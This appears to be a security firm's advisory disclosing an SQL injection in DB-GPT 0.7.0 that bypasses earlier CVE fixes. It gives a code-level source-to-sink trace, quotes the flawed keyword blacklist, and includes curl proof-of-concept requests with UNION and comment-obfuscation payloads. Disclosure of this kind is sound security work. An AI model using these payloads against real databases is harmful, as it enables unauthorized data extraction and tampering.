Skip to content
CVE-2025-51458: DB-GPT SQLI via CVE Bypass (CVE-2024-10835 & CVE-2024-10901)

CVE-2025-51458: DB-GPT SQLI via CVE Bypass (CVE-2024-10835 & CVE-2024-10901)

Grayscale portrait of a young man looking left, wearing a striped lanyard, with an olive green dot pattern background.Artemiy Malyshau· Co-founder & CTO2 min read

Key takeaways

  • 0 despite fixes for prior CVEs (CVE-2024-10835 and CVE-2024-10901).
  • (@RT optional if you want to add code, can just keep the text but remove code)
  • For any non-DuckDB database (completely unprotected):
  • Despite the fixes implemented for CVE-2024-10835 and CVE-2024-10901, attackers can still:

Description#

An SQL injection was found in DB-GPT 0.7.0 despite fixes for prior CVEs (CVE-2024-10835 and CVE-2024-10901). Both /v1/editor/sql/run and /v1/editor/chart/run endpoints remain vulnerable to SQL injection. The previous patches implemented blacklist-based protections for DuckDB connections, but missed the path allowing direct execution of user-provided SQL without proper parameterization.

The prior incomplete fix:

  • Added security controls exclusively for DuckDB connections.
  • Used a blacklist approach that can be bypassed with SQL obfuscation.
  • Left all other database types (MySQL, PostgreSQL, etc.) completely vulnerable.
  • Failed to implement proper parameterized queries via SQLAlchemy.

Source - Sink Analysis#

(@RT optional if you want to add code, can just keep the text but remove code)

  1. Source: editor_sql_run() in /packages/dbgpt-app/src/dbgpt_app/openapi/api_v1/editor/api_editor_v1.py
  • Receives raw SQL input via HTTP POST: pythonCopy<code class=“hljs language-python”><span class=“hljs-meta”>@router.post(<span class=“hljs-params”><span class=“hljs-string”>“/v1/editor/sql/run”</span>, response_model=Result[SqlRunData]</span>)</span> <span class=“hljs-keyword”>async</span> <span class=“hljs-keyword”>def</span> <span class=“hljs-title function_“>editor_sql_run</span>(<span class=“hljs-params”>run_param: <span class=“hljs-built_in”>dict</span> = Body(<span class=“hljs-params”></span>)</span>): <span class=“hljs-comment”># …</span> sql = run_param[<span class=“hljs-string”>“sql”</span>] </code>
  1. Intermediate: DuckDB-only blacklist filtering in editor_sql_run()
  • Attempts to filter dangerous operations but only for DuckDB: pythonCopy<code class=“hljs language-python”><span class=“hljs-keyword”>if</span> db_type == <span class=“hljs-string”>“duckdb”</span>: dangerous_keywords = [ <span class=“hljs-comment”># …</span> <span class=“hljs-string”>“copy”</span>, <span class=“hljs-string”>“export”</span>, <span class=“hljs-string”>“import”</span>, <span class=“hljs-string”>“load”</span>, <span class=“hljs-string”>“install”</span>, <span class=“hljs-comment”># …</span> ] sql_lower = sql.lower().replace(<span class=“hljs-string”>” ”</span>, <span class=“hljs-string”>""</span>) <span class=“hljs-keyword”>if</span> <span class=“hljs-built_in”>any</span>(keyword <span class=“hljs-keyword”>in</span> sql_lower <span class=“hljs-keyword”>for</span> keyword <span class=“hljs-keyword”>in</span> dangerous_keywords): </code>
  1. Intermediate: conn.query_ex() call in editor_sql_run()
  • Passes raw SQL directly to database connector: pythonCopy<code class=“hljs language-python”>colunms, sql_result = conn.query_ex(sql, timeout=<span class=“hljs-number”>30</span>) </code>
  1. Sink: query_ex() in /packages/dbgpt-core/src/dbgpt/datasource/rdbms/base.py
  • Executes raw SQL directly without parameterization: pythonCopy<code class=“hljs language-python”><span class=“hljs-keyword”>def</span> <span class=“hljs-title function_“>query_ex</span>(<span class=“hljs-params”>self, query: <span class=“hljs-built_in”>str</span>, fetch: <span class=“hljs-built_in”>str</span> = <span class=“hljs-string”>“all”</span>, timeout: <span class=“hljs-type”>Optional</span>[<span class=“hljs-built_in”>float</span>] = <span class=“hljs-literal”>None</span></span>): <span class=“hljs-comment”># …</span> <span class=“hljs-keyword”>with</span> <span class=“hljs-variable language_“>self</span>.session_scope() <span class=“hljs-keyword”>as</span> session: sql = text(query) cursor = session.execute(sql) </code>

Proof of Concept#

For any non-DuckDB database (completely unprotected):

<code class="hljs language-bash">curl -X POST <span class="hljs-string">"http://localhost:5670/api/v1/editor/sql/run"</span> \
  -H <span class="hljs-string">"Content-Type: application/json"</span> \
  -d <span class="hljs-string">'{
    "db_name": "mysql_database",
    "sql": "SELECT 1 as test UNION ALL SELECT table_name FROM information_schema.tables--"
  }'</span>
</code>

For the chart endpoint:

<code class="hljs language-bash">curl -X POST <span class="hljs-string">"http://localhost:5670/api/v1/editor/chart/run"</span> \
  -H <span class="hljs-string">"Content-Type: application/json"</span> \
  -d <span class="hljs-string">'{
    "db_name": "postgres_database",
    "chart_type": "bar",
    "sql": "SELECT 1 as label, 2 as value UNION ALL SELECT table_name, 1 FROM information_schema.tables--"
  }'</span>
</code>

For DuckDB (bypassing the blacklist protection):

<code class="hljs language-bash">curl -X POST <span class="hljs-string">"http://localhost:5670/api/v1/editor/sql/run"</span> \
  -H <span class="hljs-string">"Content-Type: application/json"</span> \
  -d <span class="hljs-string">'{
    "db_name": "duck_db",
    "sql": "SELECT * FROM (SEL/**/ECT CURRENT_SETTING(\"access_mode\") as a, 1 as b);"
  }'</span>
</code>

Impact#

Despite the fixes implemented for CVE-2024-10835 and CVE-2024-10901, attackers can still:

  • Execute arbitrary SQL commands on any connected database.
  • Extract sensitive information from all database types.
  • Modify or delete database contents.

Fix: https://github.com/eosphoros-ai/DB-GPT/pull/2650

Grayscale portrait of a young man looking left, wearing a striped lanyard, with an olive green dot pattern background.

Artemiy Malyshau

Co-founder & CTO

Artemiy served in an elite unit of the Austrian Cyber Forces, defending national infrastructure He was then the first employee at a government-backed cybersecurity research group, where he led security projects for Interpol and national governments. At Gecko he builds the platform trusted to sit inside Fortune 500 codebases, and holds it to the standard those governments taught him.

Frequently asked questions

Related content

The latest news, technologies, and resources from our team.

Subscribe to the Gecko Security newsletter

Occasional updates, new content, and insights. No spam; unsubscribe anytime.

We use your email only to send you our newsletter. See our privacy policy for how we handle your data. You can unsubscribe at any time.